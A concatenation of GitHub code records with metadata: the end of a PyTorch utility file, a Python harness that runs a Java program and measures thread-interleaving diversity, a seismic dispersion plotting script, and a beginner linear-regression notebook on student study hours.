'enc.model.3.model.1.model.1.norm.running_var',\n 'enc.model.3.model.1.model.0.norm.running_mean',\n 'enc.model.3.model.1.model.0.norm.running_var',\n 'enc.model.3.model.2.model.1.norm.running_mean',\n 'enc.model.3.model.2.model.1.norm.running_var',\n 'enc.model.3.model.2.model.0.norm.running_mean',\n 'enc.model.3.model.2.model.0.norm.running_var',\n 'enc.model.3.model.3.model.1.norm.running_mean',\n 'enc.model.3.model.3.model.1.norm.running_var',\n 'enc.model.3.model.3.model.0.norm.running_mean',\n 'enc.model.3.model.3.model.0.norm.running_var',\n\n 'dec.model.0.model.0.model.1.norm.running_mean',\n 'dec.model.0.model.0.model.1.norm.running_var',\n 'dec.model.0.model.0.model.0.norm.running_mean',\n 'dec.model.0.model.0.model.0.norm.running_var',\n 'dec.model.0.model.1.model.1.norm.running_mean',\n 'dec.model.0.model.1.model.1.norm.running_var',\n 'dec.model.0.model.1.model.0.norm.running_mean',\n 'dec.model.0.model.1.model.0.norm.running_var',\n 'dec.model.0.model.2.model.1.norm.running_mean',\n 'dec.model.0.model.2.model.1.norm.running_var',\n 'dec.model.0.model.2.model.0.norm.running_mean',\n 'dec.model.0.model.2.model.0.norm.running_var',\n 'dec.model.0.model.3.model.1.norm.running_mean',\n 'dec.model.0.model.3.model.1.norm.running_var',\n 'dec.model.0.model.3.model.0.norm.running_mean',\n 'dec.model.0.model.3.model.0.norm.running_var',\n )):\n del state_dict[key]\n return state_dict\n\n state_dict = dict()\n state_dict['a'] = __conversion_core(state_dict_base['a'], trainer_name)\n state_dict['b'] = __conversion_core(state_dict_base['b'], trainer_name)\n return state_dict\n\ndef randomflip(image, mask, texture):\n randnum = random.random()\n if randnum > 0.5:\n image = image.flip(3)\n mask, texture = mask.flip(3), texture.flip(3)\n return image, mask, texture\n\ndef randomcrop(image, mask, texture, height, width):\n random_h = random.randint(0, image.size()[2] - height)\n random_w = random.randint(0, image.size()[3] - width)\n image = image[:, :,random_h: random_h + height, random_w : random_w + width]\n mask = mask[:, :,random_h: random_h + height, random_w : random_w + width]\n texture = texture[:, :,random_h: random_h + height, random_w : random_w + width]\n return image, mask, texture\n\ndef load_state_dict(model, fname):\n \"\"\"\n Set parameters converted from Caffe models authors of VGGFace2 provide.\n See https://www.robots.ox.ac.uk/~vgg/data/vgg_face2/.\n Arguments:\n model: model\n fname: file name of parameters converted from a Caffe model, assuming the file format is Pickle.\n \"\"\"\n with open(fname, 'rb') as f:\n weights = pickle.load(f, encoding='latin1')\n\n own_state = model.state_dict()\n for name, param in weights.items():\n if name in own_state:\n try:\n own_state[name] = torch.from_numpy(param)\n # own_state[name].copy_(torch.from_numpy(param))\n except Exception:\n raise RuntimeError('While copying the parameter named {}, whose dimensions in the model are {} and whose '\\\n 'dimensions in the checkpoint are {}.'.format(name, own_state[name].size(), param.size()))\n else:\n raise KeyError('unexpected key \"{}\" in state_dict'.format(name))\n\n", "repo_name": "huangzhikun1995/IPM-Net", "sub_path": "utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 20670, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 127, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.join", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "os.path.join", 
"line_number": 53, "usage_type": "call"}, {"api_name": "os.path", "line_number": 53, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path", "line_number": 57, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path", "line_number": 65, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path", "line_number": 69, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path", "line_number": 71, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "attribute"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 82, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 82, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 83, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 83, "usage_type": "name"}, {"api_name": "torchvision.transforms.CenterCrop", "line_number": 84, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 84, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 85, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 85, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 87, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 87, "usage_type": "name"}, {"api_name": "data.ImageFolder", "line_number": 88, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 89, "usage_type": "call"}, {"api_name": "yaml.load", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 107, "usage_type": "call"}, {"api_name": "torchvision.utils.make_grid", "line_number": 108, "usage_type": "call"}, {"api_name": "torchvision.utils", "line_number": 108, "usage_type": "name"}, {"api_name": "torchvision.utils.save_image", "line_number": 109, "usage_type": "call"}, {"api_name": "torchvision.utils", "line_number": 109, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 119, "usage_type": "call"}, {"api_name": "os.path", "line_number": 119, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 120, "usage_type": "call"}, {"api_name": "os.path", "line_number": 120, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 122, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 123, "usage_type": "call"}, {"api_name": "os.path", "line_number": 123, "usage_type": "attribute"}, {"api_name": "os.path.exists", 
"line_number": 124, "usage_type": "call"}, {"api_name": "os.path", "line_number": 124, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 126, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 151, "usage_type": "call"}, {"api_name": "os.path", "line_number": 151, "usage_type": "attribute"}, {"api_name": "numpy.arccos", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 178, "usage_type": "attribute"}, {"api_name": "numpy.sin", "line_number": 179, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 180, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 189, "usage_type": "attribute"}, {"api_name": "numpy.random.randn", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 191, "usage_type": "attribute"}, {"api_name": "numpy.random.randn", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 192, "usage_type": "attribute"}, {"api_name": "numpy.linspace", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 194, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 195, "usage_type": "attribute"}, {"api_name": "numpy.vstack", "line_number": 196, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 198, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 203, "usage_type": "call"}, {"api_name": "os.path", "line_number": 203, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 205, "usage_type": "call"}, {"api_name": "os.path", "line_number": 205, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 205, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 206, "usage_type": "call"}, {"api_name": "os.path", "line_number": 206, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 206, "usage_type": "call"}, {"api_name": "resnet.resnet50", "line_number": 215, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 220, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 224, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 224, "usage_type": "name"}, {"api_name": "torch.chunk", "line_number": 232, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 233, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 239, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler.StepLR", "line_number": 247, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler", "line_number": 247, "usage_type": "name"}, {"api_name": "torch.nn.init.normal_", "line_number": 260, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 260, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_normal_", "line_number": 262, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 262, "usage_type": "name"}, {"api_name": "math.sqrt", "line_number": 262, "usage_type": "call"}, {"api_name": "torch.nn.init.kaiming_normal_", "line_number": 264, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 264, "usage_type": "name"}, {"api_name": "torch.nn.init.orthogonal_", "line_number": 266, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 266, 
"usage_type": "name"}, {"api_name": "math.sqrt", "line_number": 266, "usage_type": "call"}, {"api_name": "torch.nn.init.constant_", "line_number": 272, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 272, "usage_type": "name"}, {"api_name": "time.time", "line_number": 283, "usage_type": "call"}, {"api_name": "time.time", "line_number": 286, "usage_type": "call"}, {"api_name": "random.random", "line_number": 371, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 378, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 379, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 394, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 400, "usage_type": "call"}]} +{"seq_id": "74971681767", "text": "import argparse\n\n# Create parser for reading program arguments\nimport os\nimport shutil\nimport subprocess\nimport jellyfish as jf\nimport numpy\nimport numpy as np\nimport time\nfrom tqdm import tqdm\n\n\n# Convert a string to unicode\ndef to_unicode(code: int):\n return chr(int(str(code).zfill(8), 16))\n\n\ndef flatten_results_map(results_map):\n total = \"\"\n for key in results_map.keys():\n total += f\"({key},{round(results_map[key], 4)})\"\n return total\n\n\nargparser = argparse.ArgumentParser(\n prog='testscript',\n description='Automate OSCAR\\'s noise injection routine.',\n epilog='Run with argument -h for help.'\n)\n\nDISTANCE_ALGS = {\n 0: \"Levenshtein\",\n 1: \"Damerau-Levenshtein\",\n 2: \"Jaro\",\n 3: \"Jaro-Wrinkler\",\n 4: \"Hamming\",\n}\n\nargparser.add_argument('program_dir', help='location of program to run.')\nargparser.add_argument('executable', help='Name of program\\'s main class to run or jar file name.')\nargparser.add_argument('program_args', type=str, help='Arguments to be passed to program.')\n\nargparser.add_argument('-c', '--count', default=\"30\", type=str,\n help='Number of times to run program (comma separated).')\nargparser.add_argument('-da', '--distance_algorithm', default=\"0\", type=int,\n help=f'Distance algorithm: {DISTANCE_ALGS}.')\nargparser.add_argument('-j', '--jar', action='store_true', help='Run program as a jar.')\nargparser.add_argument('-dt', '--disable_thread_ids', action='store_true', help='Disable thread ID parsing.')\nargparser.add_argument('-utl', '--unique_trace_locations', action='store_true',\n help='Enable unique ids for repeated trace locations.')\nargparser.add_argument('-uti', '--unordered_thread_ids', action='store_true', help='Maintain original thread ID order.')\nargparser.add_argument('-dc', '--disable_coverage', action='store_true', help='Disable coverage analysis.')\nargparser.add_argument('-di', '--disable_interleaving', action='store_true', help='Disable interleaving analysis.')\nargparser.add_argument('-of', '--output_flags', type=str, help='Flags which will be checked in program output.')\n\nargv = argparser.parse_args()\n\n# Check distance alg valid\nif argv.distance_algorithm < 0 or argv.distance_algorithm > len(DISTANCE_ALGS) - 1:\n print(f'Invalid distance algorithm.')\n exit(1)\n\n# Check if file exists\nif not os.path.isdir(argv.program_dir):\n print(f'Folder {argv.program_dir} not found')\n exit(1)\n\nos.chdir(argv.program_dir)\n\n# Remove old generated files\nif os.path.isdir('oscar_output'):\n shutil.rmtree('oscar_output')\n\n###############################################################################################################\n\n# Save runtimes\nruntimes = []\n\nrun_counts = []\nfor rc in str(argv.count).split(\",\"):\n 
run_counts.append(int(rc))\n\nruns = run_counts[len(run_counts) - 1]\n\nprint(f'Running program {argv.count} times')\n\nFLAGS = str(argv.output_flags).split(\",\")\nflags_detected = {}\n\n# Run program x times\nfor i in tqdm(range(0, runs), desc=\"Variable Args\"):\n start_time = time.time_ns() / 1_000_000\n\n if not argv.jar:\n result = subprocess.run(\n f'java {argv.executable} {argv.program_args}',\n shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE\n )\n else:\n result = subprocess.run(\n f'java -jar {argv.executable} {argv.program_args}',\n shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE\n )\n\n if result.returncode != 0:\n print(result.stderr.decode('utf-8'))\n print(result.stdout.decode('utf-8'))\n\n # Check the output for flags\n output = result.stdout.decode('utf-8')\n\n # Parse line by line to check for flags\n for line in output.split(\"\\n\"):\n for flag in FLAGS:\n if flag in line:\n if line in flags_detected:\n flags_detected[line] = flags_detected[line] + 1\n else:\n flags_detected[line] = 1\n break\n\n for rc in str(argv.count).split(\",\"):\n run_counts.append(int(rc))\n\n runtimes.append(time.time_ns() / 1_000_000 - start_time)\n\nprint(f'Finished running. Analyzing files.')\n\n###############################################################################################################\n\n\n###############################################################################################################\n\nprint()\nprint(\"Results:\")\nprint(f'\\tAverage runtime (ms): {round(np.average(runtimes), 0)}')\n\nfor flag in flags_detected:\n print(f'\\tDetected flag_-_-{flag}-_-_{flags_detected[flag]}')\n\nif not argv.disable_coverage:\n # Try to analyze created files\n os.chdir('oscar_output')\n files = os.listdir('.')\n\n location_ids = {}\n interleavings = []\n trace_pairs = {}\n\n for file in files:\n content = open(file, 'r') # .read()\n thread_ids = []\n trace_pairs_count = {}\n\n interleaving = ''\n\n # Get all thread ids for ordering\n for line in content:\n thread_id = int(line.split(' ')[0].strip())\n if thread_id not in thread_ids:\n thread_ids.append(thread_id)\n\n # Check if thread ids should maintain order when mapped\n if argv.unordered_thread_ids:\n thread_ids = numpy.sort(thread_ids)\n\n # Map thread ids\n mapped_thread_ids = {}\n for i in range(0, len(thread_ids)):\n mapped_thread_ids[thread_ids[i]] = to_unicode(i)\n\n # Parse normally\n content = open(file, 'r')\n\n for line in content:\n thread_id = mapped_thread_ids[int(line.split(' ')[0].strip())]\n\n # Make the interleaving id value start from 0\n location_id = line.split(' ')[1].strip()\n if location_id not in location_ids:\n location_ids[location_id] = to_unicode(len(location_ids) + len(thread_ids))\n location_id = location_ids[location_id]\n\n # Append content with or without thread id\n trace_pair = location_id\n if not argv.disable_thread_ids:\n trace_pair = f'{thread_id}{trace_pair}'\n\n # Check if this interleaving pair is duplicate and needs new assigned id\n if argv.unique_trace_locations:\n if trace_pair not in trace_pairs_count:\n trace_pairs_count[trace_pair] = 0\n trace_pairs_count[trace_pair] += 1\n\n trace_pair = f'{trace_pairs_count[trace_pair]}_{trace_pair}'\n\n # Transform interleaving pair representation in single mapped unicode\n if trace_pair not in trace_pairs:\n trace_pairs[trace_pair] = to_unicode(len(trace_pairs))\n\n interleaving += trace_pairs[trace_pair]\n\n interleavings.append(interleaving)\n\n # Parse interleavings\n avg_dist_runs = {}\n std_dev_runs = {}\n 
uniq_interleavings_runs = {}\n avg_cluster_size = {}\n\n for rc in run_counts:\n interleavings_split = interleavings[0:rc]\n uniq_interleavings_runs[rc] = len(set(interleavings_split))\n\n clusters = {}\n # Calculate avg cluster size\n for interleaving in interleavings_split:\n if interleaving not in clusters:\n clusters[interleaving] = 1\n else:\n clusters[interleaving] += 1\n\n avg_cluster_size[rc] = np.average(list(clusters.values()))\n\n # For regular pairs\n interleaving_dists = []\n interleaving_dist = 0\n\n # Calculate average ratio\n if not argv.disable_coverage:\n for x in range(0, len(interleavings_split) - 1):\n for y in range(x + 1, len(interleavings_split)):\n ix = interleavings_split[x]\n iy = interleavings_split[y]\n\n # Levenshtein\n if argv.distance_algorithm == 0:\n interleaving_dist = jf.levenshtein_distance(ix, iy)\n\n # Damerau-Levenshtein\n if argv.distance_algorithm == 1:\n interleaving_dist = jf.damerau_levenshtein_distance(ix, iy)\n\n # Jaro\n if argv.distance_algorithm == 2:\n interleaving_dist = jf.jaro_similarity(ix, iy)\n\n # Jaro-Wrinkler\n if argv.distance_algorithm == 3:\n interleaving_dist = jf.jaro_winkler_similarity(ix, iy)\n\n # Hamming\n if argv.distance_algorithm == 4:\n interleaving_dist = jf.hamming_distance(ix, iy)\n\n interleaving_dists.append(interleaving_dist)\n else:\n interleaving_dists.append(1)\n\n avg_dist_runs[rc] = round(np.average(interleaving_dists), 4)\n std_dev_runs[rc] = round(float(np.std(interleaving_dists)), 4)\n\n distance_alg = DISTANCE_ALGS[argv.distance_algorithm]\n print(f'\\tUnique interleavings: {flatten_results_map(uniq_interleavings_runs)}')\n print(f'\\tAverage {distance_alg} distance: {flatten_results_map(avg_dist_runs)}')\n print(f'\\t{distance_alg} distance standard deviation: {flatten_results_map(std_dev_runs)}')\n print(f'\\tAverage Cluster Size: {flatten_results_map(avg_cluster_size)}')\n", "repo_name": "filipedeluna/oscar", "sub_path": "py_scripts/testscript/testscript.py", "file_name": "testscript.py", "file_ext": "py", "file_size_in_byte": 9280, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path", "line_number": 65, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 73, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 92, "usage_type": "call"}, {"api_name": "time.time_ns", "line_number": 93, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 96, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 98, "usage_type": "attribute"}, {"api_name": "subprocess.run", "line_number": 101, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 103, "usage_type": "attribute"}, {"api_name": "time.time_ns", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 137, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 144, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.sort", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 224, "usage_type": "call"}, 
{"api_name": "jellyfish.levenshtein_distance", "line_number": 239, "usage_type": "call"}, {"api_name": "jellyfish.damerau_levenshtein_distance", "line_number": 243, "usage_type": "call"}, {"api_name": "jellyfish.jaro_similarity", "line_number": 247, "usage_type": "call"}, {"api_name": "jellyfish.jaro_winkler_similarity", "line_number": 251, "usage_type": "call"}, {"api_name": "jellyfish.hamming_distance", "line_number": 255, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 261, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 262, "usage_type": "call"}]} +{"seq_id": "28213444995", "text": "import os\nimport argparse\n\nimport numpy\nimport matplotlib.pyplot as P\n\nfrom scipy.special import jacobi\n\ndef loaddispersion(fname):\n\n f = open(fname, 'r')\n lines = f.readlines()\n\n slon, slat, dlon, dlat, distkm = map(float, lines[0].split())\n freq, count, acsn, csn, N = map(float, lines[1].split())\n\n f, r, i, ncfr, ncfi = zip(*map(lambda x: map(float, x.split()), lines[2:]))\n\n spec = numpy.array(r) + numpy.array(i)*1.0j\n ncf = numpy.array(ncfr) + numpy.array(ncfi)*1.0j\n return (slon, slat, dlon, dlat, distkm, int(count)), numpy.array(f), freq, acsn, csn, spec, ncf\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n \n parser.add_argument('-f', '--fits', type = str, required = True, help = 'Fits base path')\n\n parser.add_argument('-d', '--data', type = str, default = '../example_data', help = 'Data base path')\n\n parser.add_argument('--width', type = float, default = 8.0, help = 'Figure width')\n parser.add_argument('--height', type = float, default = 3.0, help = 'Figure height')\n \n args = parser.parse_args()\n\n if os.access(os.path.join(args.fits, 'opt.pred'), os.R_OK):\n rayleighpred = numpy.loadtxt(os.path.join(args.fits, 'opt.pred'))\n elif os.access(os.path.join(args.fits, 'opt.pred-rayleigh'), os.R_OK):\n rayleighpred = numpy.loadtxt(os.path.join(args.fits, 'opt.pred-rayleigh'))\n else:\n raise Exception('No predictions file %s found' % os.path.join(args.fits, 'opt.pred'))\n\n stationpair = '_'.join(os.path.basename(args.fits.rstrip('/')).split('_')[1:3])\n\n rayleighdata = os.path.join(args.data, 'RayleighResponse/dispersion_%s.txt' % stationpair)\n\n (_, _, _, _, distkm, _), f, sample_rate, rayleigh_acsn, rayleigh_csn, rayleigh_spec, rayleigh_ncf = loaddispersion(rayleighdata)\n\n figB, bx = P.subplots()\n figB.set_size_inches((args.width, args.height))\n figB.set_tight_layout(True)\n\n #\n # Modulated Bessel is column 5, Raw Bessel is column 3, Envelope 4\n #\n colindex = 5\n #colindex = 3\n\n indices = numpy.where(rayleighpred[:,1] > 0.0)[0]\n\n bx.set_title('Rayleigh')\n bx.plot(rayleighpred[indices,0], rayleighpred[indices,colindex], 'r-', linewidth = 1, zorder = 100)\n bx.plot(f, numpy.real(rayleigh_ncf), linestyle = 'solid', color = 'grey', linewidth = 2, zorder = 50)\n\n bx.set_xlim(0, 0.4)\n\n bx.set_xlabel('Frequency (Hz)')\n\n P.show()\n", "repo_name": "rhyshawkins/AkiEstimate", "sub_path": "tutorial/scripts/plot_bessel_result_rayleigh.py", "file_name": "plot_bessel_result_rayleigh.py", "file_ext": "py", "file_size_in_byte": 2401, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 9, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.array", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 21, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 25, 
"usage_type": "call"}, {"api_name": "os.access", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.R_OK", "line_number": 36, "usage_type": "attribute"}, {"api_name": "numpy.loadtxt", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.access", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "os.R_OK", "line_number": 38, "usage_type": "attribute"}, {"api_name": "numpy.loadtxt", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "numpy.where", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.real", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}]} +{"seq_id": "12441036076", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# # Tanya Aggarwal\n# \n# # GRIP JUNE'22\n\n# # Prediction of student's study hours by linear regression\n# \n\n# # LINEAR REGRESSION:- \n# Linear regression analysis is used to predict the value of a variable based on the value of another variable. The variable you want to predict is called the dependent variable. 
The variable you are using to predict the other variable's value is called the independent variable.\n# \n# #simple linear regression:- In this task we will predict the percentage of marks that a student is expected to score based upon the number of hours they studies.\n# \n# As only two variables are involved i.e 1 dependent and 1 independent variable ,this is Simple linear regresion\n# \n# \n\n# In[2]:\n\n\n#importing Libraries\nimport pandas as pd #for manipulationg and analyse the data\nimport numpy as np #for numerical data\nimport matplotlib.pyplot as plt #for plotting the data\n#%matplotlib inline # for inline plotting(below the commands)\n\n\n# In[3]:\n\n\n#Importing Data\nurl='https://raw.githubusercontent.com/AdiPersonalWorks/Random/master/student_scores%20-%20student_scores.csv'\ndf1=pd.read_csv(url) #to read the data \nprint(\"Data imported successfully\")\nprint(df1)\n\n\n# In[4]:\n\n\n#if we want to print the limited values\ndf1.head(2) #to get upper values\ndf1.tail(2) #to get below values\n\n\n# In[5]:\n\n\n#Plotting the distribution of scores\ndf1.plot(x='Hours', y='Scores',style='o') #ploptting(we can change style *,1)\nplt.title('Hours vs Percentage') #title of graph\nplt.xlabel('Hours Studied') #label x axis\nplt.ylabel('Percentage Score') #label y axis\nplt.show()\n\n\n# In[6]:\n\n\n#As we can see the above graph, we can conclude that as hours studied increases ,percentafe increases. So, we can say that \n#there's a positive linear relation between two variables\n\n\n# # Preparing the data\n\n# In[7]:\n\n\n#Step-1:-In the next step we're going to divide data into \"attributes\"(inputs) and\"labels\"(Outputs)\n#Independent and Deoendent features\nx=df1.iloc[:,:-1].values #iloc() function enables us to select a particular cell of the dataset\n#print(x)\ny=df1.iloc[:,-1].values \nprint(y)\n\n\n# In[9]:\n\n\n#step 2-Split the data into training and testing sets by Using Scikit -learn's built in train_test_split()method\n# train_test_split is a function in Sklearn model selection for splitting data arrays into two subsets:\n#for training data and for testing data. With this function, you don't need to divide the dataset manually.\n#By default, Sklearn train_test_split will make random partitions for the two subsets\n\nfrom sklearn.model_selection import train_test_split\nx_train,x_test,y_train,y_test=train_test_split(x,y,test_size=0.2,random_state=0) #,test_size=0.2=20% for testing\n\n\n# # Training the Algorithm\n# \n\n# In[10]:\n\n\n#step-3:- Train the Algorithm\n\nfrom sklearn.linear_model import LinearRegression\nregressor=LinearRegression()\nregressor.fit(x_train,y_train)\nprint(\"Training Done\")\n\n\n# In[11]:\n\n\n#step 4:- Plotting the training line\nline = regressor.coef_*x+regressor.intercept_\n\n#Plotting the test data\nplt.scatter(x,y)\nplt.plot(x,line);\nplt.show()\n\n\n# # Prediction\n\n# In[12]:\n\n\nprint(x_test) #testing data in hours\ny_pred=regressor.predict(x_test) #predicting the scores\nprint(y_pred)\n\n\n# In[13]:\n\n\n#Comparing Actual Vs prediction\ndf2=pd.DataFrame({'Actual': y_test,'Predicted': y_pred})\ndf2\n\n\n# In[14]:\n\n\n#Checking own data\nhours=9.25\nown_pred=regressor.predict([[hours]])\nprint('Predicted score if student study 9.25 hours/day')\nprint('No. 
of hours={}'.format(hours))\nprint('Predicted Score={}'.format(own_pred[0]))\n\n\n# In[15]:\n\n\nfrom sklearn import metrics\nprint('Mean Absolute Error:',metrics.mean_absolute_error(y_test,y_pred))\n\n\n# In[ ]:\n\n\n\n\n", "repo_name": "tanya99aggarwal/The-Sparks-Foundation-Internship", "sub_path": "GRIPJUNE'22 (Task -1).py", "file_name": "GRIPJUNE'22 (Task -1).py", "file_ext": "py", "file_size_in_byte": 3895, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.read_csv", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 88, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 131, "usage_type": 